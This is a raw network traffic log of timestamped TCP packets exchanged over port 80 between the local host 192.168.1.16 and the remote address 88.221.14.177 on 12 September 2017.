Sep 12, 2017 22:19:01.006287098 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.006313086 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.006328106 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.006576061 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.016103029 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.016134024 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.016174078 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.016271114 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.016526937 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.016550064 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.016566992 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.016628027 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.053251982 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.053421021 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.142636061 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.142667055 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.142680883 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.142786026 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.173907995 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.173945904 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.173960924 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.174065113 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.215353966 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.215383053 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.215392113 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.215495110 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.216958046 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.216990948 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.217000008 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.217081070 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.217545986 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.240401030 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.240638018 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.253384113 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.253422022 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.253433943 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.253608942 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.287096977 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.287116051 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.287127018 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.287228107 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.293262959 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.293277025 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.293294907 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.293387890 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.297308922 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.297334909 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.297349930 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.297435045 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.333180904 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.333352089 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.335726023 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.335748911 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.335753918 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.335838079 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.372770071 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.372797012 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.372813940 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.372862101 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.373394966 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.390805960 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.390835047 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.390846968 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.390923023 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.421101093 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.421123981 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.421135902 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.421231985 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.421252966 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.421928883 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.440769911 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.440798998 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.440810919 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.440906048 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.453459024 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.453484058 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.453493118 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.453648090 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.486088037 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.486119986 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.486138105 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.486213923 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.510169983 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.510205984 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.510231972 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.510391951 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.525676012 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.525774956 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.527457952 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.527488947 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.527514935 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.527565002 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.528500080 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.565310001 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.565332890 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.565345049 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.565435886 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.568170071 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.568192959 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.568209887 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.568219900 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.568358898 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.568386078 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.569067955 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.569087029 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.569097042 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.569159031 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.592355967 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.592390060 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.605384111 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.605535030 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.639421940 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.639446974 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.639456034 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.639650106 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.677957058 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.677990913 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.677999020 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.678204060 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.687720060 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.687752962 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.687764883 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.687946081 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.718164921 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.718194008 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.718202114 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.718410969 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.743469000 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.743699074 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.744136095 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.744157076 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.744170904 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.744251966 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.758326054 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.758362055 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.758371115 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.758498907 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.784699917 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.784712076 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.784717083 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.784874916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.784912109 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.785037994 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.785084009 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.785407066 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.797055960 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.797156096 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.820653915 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.838824987 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.838862896 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.838882923 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.839013100 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.877348900 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.877381086 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.877392054 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.877477884 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.879333973 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.879369020 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.879383087 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.879450083 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.917243004 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.917278051 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.917287111 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.917438030 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.935156107 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.935404062 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.935559988 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.935590982 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.935600042 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.935703993 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.973298073 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.973330975 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.973344088 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.973510027 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.975976944 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.976006985 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.976016045 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.976181030 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.999280930 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.999434948 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:01.999484062 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.999502897 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:01.999577045 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.035465956 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.035484076 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.035489082 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.035682917 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.053407907 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.053452969 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.053461075 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.053654909 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.063968897 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.064003944 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.064023018 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.064209938 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.064526081 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.064544916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.064558029 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.064678907 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.102046967 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.102312088 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.112901926 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.112942934 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.112956047 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.113159895 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.144782066 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.144820929 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.144845009 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.144999981 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.157547951 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.157584906 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.157613039 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.157681942 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.158010960 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.158039093 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.158056974 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.158225060 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.181879044 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.182076931 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.200323105 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.200366974 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.200381994 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.200781107 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.201467991 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.201487064 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.201513052 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.201595068 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.246293068 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.246326923 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.246335983 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.246553898 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.247499943 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.247519016 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.247528076 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.247673988 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.292884111 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.293070078 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.310173035 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.310200930 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.310209990 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.310359955 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.325706959 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.325743914 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.325754881 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.325931072 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.339090109 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.339119911 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.339129925 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.339323997 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.365319967 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.365372896 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.365391016 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.365650892 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.692828894 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.693610907 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.693638086 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.821769953 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.821805954 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.821820021 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.822030067 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.862427950 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.862463951 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.862473965 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.862559080 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.863527060 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.863553047 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.863562107 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.863647938 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.864109993 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.864125013 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.864136934 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.864188910 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.885452986 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.885706902 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.925595999 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.925643921 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.925666094 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.925860882 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:02.965526104 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.965572119 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.965596914 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:02.965754986 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.005481958 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.005520105 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.005728006 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.192238092 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.193259001 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.193300009 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.848315001 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.848349094 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.848357916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.848637104 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.879895926 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.879920006 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.879935980 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.880103111 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.880321026 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.880390882 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.881169081 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.881194115 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.881217957 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.881290913 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.881365061 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.881383896 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.881448984 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.881470919 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.885781050 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.885817051 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.885884047 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.949445009 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.949503899 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.949525118 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.949659109 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.981050014 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.981081009 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.981272936 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.993573904 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:03.996839046 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.996879101 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.996906996 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:03.997014046 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.028834105 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.028872013 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.028884888 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:04.029083014 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:04.038907051 MESZ	80	49201	88.221.14.177	192.168.1.16
